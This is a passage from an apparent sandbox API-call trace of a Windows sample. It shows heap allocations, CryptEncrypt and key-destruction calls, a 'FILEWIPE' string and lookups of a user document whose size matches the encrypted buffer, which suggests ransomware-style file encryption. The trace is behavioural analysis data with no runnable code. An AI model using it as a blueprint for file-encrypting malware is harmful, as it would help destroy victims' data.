(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0179.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.545] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa86008*, pdwDataLen=0x87e820*=0x137f5, dwBufLen=0x13800 | out: pbData=0xa86008*, pdwDataLen=0x87e820*=0x13800) returned 1 [0179.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0179.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0179.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0179.546] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.547] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.547] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.559] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0179.559] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.559] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0179.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0179.560] CryptDestroyKey (hKey=0x90aed8) returned 1 [0179.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0179.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0179.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0179.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0179.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.565] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.596] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.596] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.596] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.596] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.596] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0179.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0179.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0179.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0179.596] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0179.597] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.597] FreeLibrary (hLibModule=0x74f20000) returned 1 [0179.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0179.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0179.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0179.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0179.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0179.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0179.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0179.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0179.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0179.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0179.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0179.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0179.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0179.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0179.598] CloseHandle (hObject=0x138) returned 1 [0179.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0179.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0179.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0179.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0179.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0179.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.599] CloseHandle (hObject=0x120) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0179.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0179.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0179.608] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.608] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\vupb0.pps")) returned 0x20 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.609] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c95c9b0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xd9387fe0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xd9387fe0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x137f5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="vupb0.pps", cAlternateFileName="")) returned 0x90af58 [0179.609] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 